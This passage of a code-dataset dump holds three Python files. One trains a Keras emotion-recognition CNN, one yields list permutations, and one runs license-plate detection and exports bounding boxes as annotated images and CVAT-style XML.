    (``logs = {}`` is created once at definition time and shared between
    calls) and tolerates a missing 'accuracy' metric.
    """

    def on_epoch_end(self, epoch, logs=None):
        """Stop training if this epoch's 'accuracy' metric is >= 0.9.

        :param epoch: index of the epoch that just finished (unused).
        :param logs: metric dict supplied by Keras; may be None.
        """
        logs = logs or {}
        # .get() avoids a KeyError when 'accuracy' is not tracked.
        if logs.get('accuracy', 0.0) >= 0.9:
            print('\nReach the desire accuracy so stop training')
            self.model.stop_training = True
# --- CLI: single required argument -> where ModelCheckpoint saves weights.
ap = argparse.ArgumentParser()
ap.add_argument("-c", "--checkpoints", required=True, help="path to output checkpoint directory")
args = vars(ap.parse_args())

# --- Model: custom CNN (approach 1) vs. transfer learning (approach 2).
model = EmotionDetectModel() #Appoach 1
model.summary()
# model = TranserLearningModel() #Approach 2

# --- Augmentation: train images rescaled to [0, 1] and randomly jittered;
# validation images only rescaled.
train_datagen = ImageDataGenerator(
    rescale = 1.0/255,
    rotation_range = 20,
    width_shift_range = 0.15,
    height_shift_range = 0.15,
    zoom_range = 0.1,
    shear_range = 0.2,
    horizontal_flip= True,
    fill_mode = 'nearest'
)
val_datagen = ImageDataGenerator(
    rescale = 1.0/255
)
iap = ImageToArrayPreprocess()
# HDF5-backed batch generators for the train/validation splits.
trainGen = HDF5DatasetGenerator(config.TRAIN_HDF5, config.BATCH_SIZE, aug=train_datagen, preprocessors=[iap], classes=config.NUM_CLASSES)
valGen = HDF5DatasetGenerator(config.VAL_HDF5, config.BATCH_SIZE, aug=val_datagen, preprocessors=[iap], classes=config.NUM_CLASSES)

# --- Hyper-parameters and two alternative LR schedules (1/t decay, step decay).
EPOCHS = 100
INIT_LR = 1e-2
DECAY_RATE = 1.0
FACTOR = 0.1
# NOTE(review): neither lr_decay_1 nor lr_decay_2 is included in the
# `callbacks` list below, so both schedules are currently unused -- confirm.
lr_decay_1 = LearningRateScheduler(lambda epoch: INIT_LR*(1/(1 + DECAY_RATE*epoch)))
lr_decay_2 = LearningRateScheduler(lambda epoch: INIT_LR*FACTOR**(epoch/10))

# --- Callbacks: live training plot/JSON log + best-val-loss checkpointing
# + early stop at 90% training accuracy.
figPath = os.path.sep.join([config.OUTPUT_PATH, "Duynet_emotion.png"])
jsonPath = os.path.sep.join([config.OUTPUT_PATH, "Duynet_emotion.json"])
monitor = TrainingMonitor(figPath, jsonPath=jsonPath, startAt=0)
checkpoint = ModelCheckpoint(
    save_best_only = True,
    monitor = 'val_loss',
    mode = 'min',
    filepath = args['checkpoints'],
    verbose = 1
)
stop_train = EarlyStopTraining()
callbacks = [monitor, checkpoint, stop_train]

# --- Compile and train.
adam = Adam(lr = INIT_LR, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-8)
model.compile(optimizer = adam, loss = tf.keras.losses.CategoricalCrossentropy(), metrics = ['accuracy'])
history = model.fit_generator(
    trainGen.generator(),
    epochs = EPOCHS,
    steps_per_epoch = trainGen.numImages // config.BATCH_SIZE,
    validation_data = valGen.generator(),
    validation_steps = valGen.numImages // config.BATCH_SIZE,
    callbacks = callbacks,
    verbose = 1
)
trainGen.close()
valGen.close()
# Pull the four learning curves out of the Keras history object.
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))

# Accuracy curves.
plt.plot(epochs, acc, 'r', label = 'train_accuracy')
plt.plot(epochs, val_acc, 'b', label = 'val_accuracy')
plt.title('Train acc and Val acc')
plt.xlabel('Epochs')
plt.ylabel('Acc')
plt.legend()
plt.figure()

# Loss curves. FIX: the original plotted `acc` for BOTH of these lines,
# so the loss figure actually showed accuracy twice.
plt.plot(epochs, loss, 'r', label = 'train_loss')
plt.plot(epochs, val_loss, 'b', label = 'val_loss')
plt.title('Train loss and Val loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.figure()
|
17,098 | 2091b82c86dd0683df3a4604338f540a3259cf3e | from itertools import permutations
def possible_permutations(elements):
    """Lazily yield every permutation of *elements*, each as a list.

    :param elements: any finite iterable.
    :yields: one permutation per iteration, in ``itertools.permutations``
        order (lexicographic in input positions).
    """
    for p in permutations(elements):
        yield list(p)


# Drive the generator with a plain loop: the original used a list
# comprehension purely for its side effect, building a throwaway list of
# None values.
for perm in possible_permutations([1, 2, 3]):
    print(perm)
|
17,099 | d59da234469146b33a081d70e8ff2deff22292f4 | from detection_api import Detector
from detection_api.utils.parse_config import *
from detection_api.utils.utils import *

import os
import os.path as osp
from dataclasses import dataclass, field

import cv2
import numpy as np
from lxml import etree as Element
from PIL import Image

from settings import Settings
import utils
@dataclass
class BBoxClass:
    """One detection: class label, box corners (x1, y1)-(x2, y2), confidence.

    Positional constructor order is unchanged from the hand-written
    ``__init__``; the dataclass additionally provides ``repr`` and ``eq``.
    Coordinates/score may be Python or numpy scalars -- the annotations
    below are documentation only and are not enforced.
    """
    label: str
    x1: float
    y1: float
    x2: float
    y2: float
    score: float
@dataclass
class ImageClass:
    """Per-image record: identity, dimensions and accumulated detections.

    Positional constructor order (id, name, width, height) is unchanged;
    ``bbox_list`` defaults to a fresh empty list per instance via
    ``default_factory`` (never a shared mutable default).
    """
    id: int
    name: str
    width: int
    height: int
    # Filled in after detection; each element is a BBoxClass.
    bbox_list: list = field(default_factory=list)
if __name__ == '__main__':
    settings = Settings()
    if not osp.exists(settings.input_dir):
        raise FileNotFoundError(f"{settings.input_dir} directory not exists.")
    os.makedirs(settings.output_dir, exist_ok=True)
    root = os.path.dirname(os.path.realpath(__file__))
    data_config = parse_data_config(os.path.join(root, settings.config_path))
    classes = load_classes(os.path.join(root, "detection_api", data_config["names"]))
    # NOTE(review): the two lines below duplicate the input/output checks
    # already performed above -- harmless, but likely leftover.
    if not osp.exists(settings.input_dir):
        raise FileNotFoundError(f"{settings.input_dir} directory not exists.")
    os.makedirs(settings.output_dir, exist_ok=True)
    dataset = utils.get_dataset(settings.input_dir)
    images = {}  # path: ImageClass

    ### DETECTION ###
    print('Start Detection...')
    print('Creating networks and loading parameters')
    license_plate_api = Detector(settings)
    # Warm-up call so the first real image isn't slowed by lazy init.
    print('Preparing detector...')
    license_plate_api.detect(np.zeros((1080, 1920, 3), dtype=np.uint8))
    global_img_id = 0
    for cls in dataset:
        save_class_dir = osp.join(settings.output_dir, cls.name)
        cls.image_paths = sorted(cls.image_paths)
        if not os.path.exists(save_class_dir):
            os.mkdir(save_class_dir)
        for i, image_path in enumerate(cls.image_paths):
            print('[{}/{}] {}'.format(i + 1, len(cls.image_paths), image_path))
            img = np.array(Image.open(image_path).convert('RGB'))
            img_height, img_width = img.shape[0:2]
            # Register image info
            img_info = ImageClass(global_img_id, image_path, img_width, img_height)
            # get bbox result
            bboxes, labels = license_plate_api.detect(img)  # (x1, y1, x2, y2, score)
            bboxes = utils.filter_too_big(bboxes, settings.max_size_ratio, img_width, img_height)
            for idx, bbox in enumerate(bboxes):
                x1, y1, x2, y2, score = bbox
                label = classes[int(labels[idx])]
                bbox_info = BBoxClass(label, x1, y1, x2, y2, score)
                img_info.bbox_list.append(bbox_info)
            images[image_path] = img_info
            global_img_id += 1
    # Free the detector (and whatever device memory it holds) before the
    # pure-CPU rendering/XML stages.
    del license_plate_api

    ### RENDERING RESULT ###
    print(f"Rendering result... save_img={settings.save_img}")
    if settings.save_img:
        for cls in dataset:
            save_class_dir = osp.join(settings.output_dir, cls.name)
            cls.image_paths = sorted(cls.image_paths)
            for i, image_path in enumerate(cls.image_paths):
                print('[{}/{}] {}'.format(i + 1, len(cls.image_paths), image_path))
                img_save_path = osp.join(save_class_dir, '{}_detected.jpg'.format(osp.splitext(osp.split(image_path)[-1])[0]))
                img = np.array(Image.open(image_path).convert('RGB'))
                # OpenCV expects BGR channel order.
                img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
                for bbox in images[image_path].bbox_list:
                    if isinstance(bbox, BBoxClass):
                        label, x1, y1, x2, y2, score = str(bbox.label), int(bbox.x1), int(bbox.y1), int(bbox.x2), int(bbox.y2), float(bbox.score)
                        red, green, blue, thickness = settings.bbox_red, settings.bbox_green, settings.bbox_blue, settings.bbox_thickness
                        cv2.rectangle(img, (x1, y1), (x2, y2), (blue, green, red), thickness=thickness)
                        if settings.show_score:
                            cv2.putText(img, '{}:{}%'.format(label, int(score * 100)), (x1, y1),
                                        cv2.FONT_HERSHEY_SIMPLEX, 0.7, color=(0, 0, 255), thickness=2)
                        # NOTE(review): the image is rewritten once per bbox;
                        # the final file is still correct, just redundant I/O.
                        cv2.imwrite(img_save_path, img)
                    else:
                        raise TypeError("bbox object should be instance of BBoxClass")

    ### GENERATE XML ###
    # One CVAT-style XML per class: <annotations><image ...><box .../></image>...
    print('Generating XML files...')
    for cls in dataset:
        save_class_dir = osp.join(settings.output_dir, cls.name)
        cls.image_paths = sorted(cls.image_paths)
        save_path = osp.join(save_class_dir, '{}.xml'.format(cls.name))
        _annotation = Element.Element('annotations')
        for i, image_path in enumerate(cls.image_paths):
            print('[{}/{}] {}'.format(i + 1, len(cls.image_paths), image_path))
            info = images[image_path]
            imageXML = Element.Element('image')
            imageXML.set('id', str(info.id))
            imageXML.set('name', os.path.split(image_path)[-1])
            imageXML.set('width', str(info.width))
            imageXML.set('height', str(info.height))
            for b in info.bbox_list:
                if isinstance(b, BBoxClass):
                    # Normalize corner order and clamp to the image bounds.
                    xmin = max(min(b.x1, b.x2), 0)
                    ymin = max(min(b.y1, b.y2), 0)
                    xmax = min(max(b.x1, b.x2), info.width)
                    ymax = min(max(b.y1, b.y2), info.height)
                    boxXML = Element.Element('box')
                    boxXML.set('label', b.label)
                    boxXML.set('xtl', str(xmin))
                    boxXML.set('ytl', str(ymin))
                    boxXML.set('xbr', str(xmax))
                    boxXML.set('ybr', str(ymax))
                    imageXML.append(boxXML)
                else:
                    raise TypeError("bbox object should be instance of BBoxClass")
            _annotation.append(imageXML)
        with open(save_path, 'w') as f:
            print('Saving xml to {}'.format(save_path))
            f.write((Element.tostring(_annotation, pretty_print=True)).decode('utf-8'))
    print('Done.')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.